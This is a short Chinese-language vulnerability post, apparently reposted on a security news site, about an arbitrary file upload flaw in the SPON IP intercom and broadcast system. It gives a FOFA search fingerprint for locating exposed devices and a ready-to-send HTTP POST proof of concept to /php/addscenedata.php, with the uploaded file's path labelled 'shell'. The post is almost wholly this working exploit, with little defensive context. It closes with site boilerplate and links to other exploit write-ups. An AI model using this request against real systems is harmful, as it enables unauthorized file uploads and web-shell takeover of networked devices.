spon IP网络对讲广播系统任意文件上传漏洞

2024年1月2日22:26:49评论122 views字数 573阅读1分54秒阅读模式

FOFA

icon_hash="-1700598274"

POC

POST /php/addscenedata.php HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Connection: closeContent-Length: 218Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4LuoBRpTiVBo9cIQAccept-Encoding: gzip
------WebKitFormBoundary4LuoBRpTiVBo9cIQContent-Disposition: form-data; name="upload"; filename="123.txt"Content-Type: text/plain
123

------WebKitFormBoundary4LuoBRpTiVBo9cIQ--

shell

/images/scene/123.txt

知识星球会有更多漏洞

spon IP网络对讲广播系统任意文件上传漏洞

原文始发于微信公众号（摸鱼Sec）：spon IP网络对讲广播系统任意文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2024年1月2日22:26:49
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
spon IP网络对讲广播系统任意文件上传漏洞https://cn-sec.com/archives/2356893.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

spon IP网络对讲广播系统任意文件上传漏洞

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

漏洞预警 | 大华智慧园区综合管理平台远程代码执行漏洞

漏洞预警 | JeecgBoot任意文件上传漏洞

漏洞预警 | 若依druid未授权访问漏洞

发表评论

在线咨询

微信